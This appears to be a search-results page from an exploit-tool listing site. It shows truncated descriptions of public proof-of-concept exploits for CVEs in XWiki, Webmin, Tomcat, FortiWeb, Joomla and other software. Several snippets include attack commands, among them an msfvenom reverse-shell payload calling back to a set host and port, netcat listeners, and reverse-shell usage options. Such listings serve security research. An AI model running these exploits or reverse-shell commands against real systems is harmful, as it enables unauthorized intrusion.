2522 matches found
CVE-2025-24893-PoC
CVE-2025-24893-PoC XWiki Unauthenticated RCE Exploit Affected XWiki Versions Versions 15.10.11 Versions 16.4.1 Versions 16.5.0RC1 Vulnerability Description Affected XWiki versions contain a Remote Code Execution vulnerability caused by unsafe Groovy expression handling in the SolrSearch macro...
CVE-2025-56383
Vulnerabilidad root@kitploit: Tipo de ataque: DLL Hijacking secuestro de DLL Aplicación objetivo: Notepad++ Método: El archivo NppExport.dll es cargado por Notepad++ desde el directorio de trabajo Implementación La DLL maliciosa contiene: root@kitploit: Funciones exportadas de la biblioteca...
bassmaster-rce
bassmaster-rce Explotando CVE-2014-7205 mediante la inyección de JavaScript arbitrario que resulta en Ejecución Remota de Código. Me topé con esta Publicación de LuuPhu escrita en vietnamita. Ya que he escrito algo de código en NodeJS pero nunca me había encontrado explotándolo, pensé ¿por qué no...
paint2die
Exploit más simple y fiable de RichFaces Paint2DResource CVE-2018-12533 RF-14310 Instalación • Uso • Ejecutar Paint2Die Instrucciones de instalación root@kitploit: git clone https://github.com/LucasKatashi/paint2die.git cd paint2die chmod +x paint2die.py pip install -r requirements.txt Uso...
CVE-2018-3191-Rce-Exploit
CVE-2018-3191-Rce-Exploit Author: Break Step 1: java -jar GenPayload.java output SJpayload.bin, Address is RMI Server address Step 2:java -jar RMISERVER.jar httpaddress, RMI server listening on port 1099 and load remote Reverse classes on web server Step 3:put two filesreverse shell...
CVE-2025-14700-poc
CVE-2025-14700 POC Automatic exploit for Authenticated RCE in Crafty Controller --login --password --lhost --lport This script uses netcat to setup a listener after triggering the reverse shell payload, it won't work if you don't have netcat on your listener machine...
CVE-2023-26360-RCE
CVE-2023-26360 - Удаленное выполнение кода на ColdFusion 2021 Иногда скрипты не срабатывают с первой попытки. Попробуйте несколько раз, чтобы всё заработало. Как выполнить Создайте полезную нагрузку с помощью msfvenom root@kitploit: msfvenom -p java/shellreversetcp LHOST=192.168.56.1 LPORT=4444...
CVE-2025-25257
CVE-2025-25257 watchtowr와 다른 사람들이 GitHub에서 공개한 CVE-2025-25257 익스플로잇이 공식 벤더 웹사이트에서 다운로드한 fortiweb 설치 환경에서 작동하지 않았습니다. 저는 이러한 익스플로잇 코드 일부를 가져와서 내 환경에서 리버스 셸을 실행할 수 있는 PoC를 만들었습니다. 리버스 셸의 IP 주소와 포트는 하드코딩되어 있으므로 당연히 변경해야 합니다. 익스플로잇 분석 및 워크스루는 제 YouTube 채널의 두 파트 비디오로 설명되어 있습니다 이탈리아어, 영어 자막: 파트 1:...
CVE-2024-28397-Reverse-Shell
CVE-2024-28397-Reverse-Shell Reverse shell para CVE-2024-28397. El exploit funciona para js2py = v0.74 Requisitos Librería requests pip install requests Python3 Netcat O algo que puedas usar como listener para la reverse shell Uso Para el listener root@kitploit: nc -lnvp 4444 Para el exploit...
CVE-2018-8174-exp
CVE-2018-8174EXP uso: CVE-2018-8174.py -h -u URL -o OUTPUT -i IP -p PORT Exploit para CVE-2018-8174 argumentos opcionales: -h, --help muestra este mensaje de ayuda y sale -u URL, --url URL url del exploit -o OUTPUT, --output OUTPUT Archivo rtf de salida del exploit -i IP, --ip IP ip para netcat -...
oracleShell
oracleShell Oracle Database Command Execution Test Environment - DBA Privileges: SELECT FROM v$version root@kitploit: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production PL/SQL Release 11.2.0.1.0 - Production "CORE 11.2.0.1.0 Production" TNS for 32-bit Windows: Version 11.2.0.1...
CVE-2022-0944
CVE-2022-0944 Un exploit de prueba de concepto para SQLPad RCE CVE-2022-0944 Uso root@kitploit: usage: main.py -h url lhost lport username password positional arguments: url URL to SQLPad lhost Listener host address for reverse shell lport Listener port for reverse shell username login username...
CVE-2019-15107
CVE-2019-15107 Webmin 1.890 Ejecución remota de código no autenticada Este script está diseñado para explotar la vulnerabilidad de ejecución de comandos no autenticada en Webmin 1.890. Permite ejecutar comandos arbitrarios en un servidor Webmin objetivo u obtener una shell inversa. Uso El exploit...
CVE-2019-0232
Exploit for Apache Tomcat CVE-2019-0232 This script exploits the CVE-2019-0232 vulnerability in Apache Tomcat, which allows remote code execution through the improper handling of the ism.bat script. The script leverages a reverse shell technique using certutil and nc.exe Netcat to gain remote...
PCmanBoF
PCman FTP Server Desbordamiento de búfer y ejecución remota de código CVE-2013-4730 Un desbordamiento de búfer muy simple que utiliza CVE-2013-4730 contra el servidor FTP de PCman v.2.0.7 ¿Cómo funciona? Ese simple BoF sobrescribe el búfer y ejecuta el shellcode que se conectará de vuelta reverse...
APT-Backpack
Mochila-APT CVEs más comunes utilizados por APT, RAT legítimos y otras herramientas utilizadas por el adversario CVEs CVE-2019-11510 Pulse Connect Secure 8.2 8.3 9.0 Lectura de archivo no autenticada CVE-2019-19781 Citrix ADC & Gateway Directory Traversal CVE-2020-5902 F5 Big IP RCE CVE-2021-1497...
CVE-2015-8562
CVE-2015-8562 - Reverse shell Python Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header: root@kitploit: Fecha de vulnerabilidad: 17/12/2015 Autor del exploit: anarc0der Versión: Joomla 1.5 a 3.4.5 CVE : CVE-2015-8562 Cómo usar: root@kitploit: Abre un terminal y escucha con nc...
CVE-2020-8816
CVE-2020-8816 Un script de Python para explotar CVE-2020-8816, una vulnerabilidad de ejecución remota de código en Pi-hole. Este script utiliza las técnicas encontradas por François Renaud-Philippon para lograr la ejecución remota de código en un Pi-hole que ejecute una versión de la interfaz web...
cve-2025-23266-migration-bypass
cve-2025-23266-migration-bypass cve-2025-23266-migration-bypass dos métodos para obtener el contenido de la flag: 1. copiarlo desde el host al directorio montado del contenedor; 2. usar una reverse shell para obtenerlo;...
CVE-2024-48990-POC
CVE-2024-48990-POC PoC simple para CVE-2024-48990 vulnerabilidad de escalada de privilegios con needrestart. https://www.qualys.com/2024/11/19/needrestart/needrestart.txt Descripción General Esto fue diseñado mientras trabajaba en el desafío de HackTheBox, 'Conversor'. Se realizarán modificacione...